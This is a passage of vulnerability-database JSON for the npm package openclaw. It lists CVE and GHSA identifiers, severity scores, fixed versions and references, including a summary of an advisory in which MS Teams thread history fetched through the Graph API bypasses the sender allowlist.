/github.com/openclaw/openclaw/security/advisories/GHSA-9q36-67vc-rrwg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["CVE-2026-27646","GHSA-9q36-67vc-rrwg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j6nj-gf5b-1khk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89568?format=json","vulnerability_id":"VCID-j8fb-fhyc-33fu","summary":"OpenClaw: MSTeams thread history bypasses sender allowlist via Graph API\n## Summary\nMSTeams thread history bypasses sender allowlist via Graph API\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 MS Teams because Graph-fetched thread history bypasses sender allowlists, with unreleased mainline filtering fix.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `5cca38084074fb5095aa11b6a59820d63e4937c9` — 2026-03-30T15:38:26+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41365","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41365"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5cca38084074fb5095aa11b6a59820d63e4937c9","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T13:54:54Z/"}],"url":"https://github.com/openclaw/openclaw/commit/5cca38084074fb5095aa11b6a59820d63e4937c9"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-chfm-xgc4-47rj","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T13:54:54Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-chfm-xgc4-47rj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41365","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41365"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-graph-api-thread-history","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T13:54:54Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-graph-api-thread-history"},{"reference_url":"https://github.com/advisories/GHSA-chfm-xgc4-47rj","reference_id":"GHSA-chfm-xgc4-47rj","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-chfm-xgc4-47rj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41365","GHSA-chfm-xgc4-47rj"],"risk_score":2.5,"exploitability":"0.5","weighted_severity":"4.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j8fb-f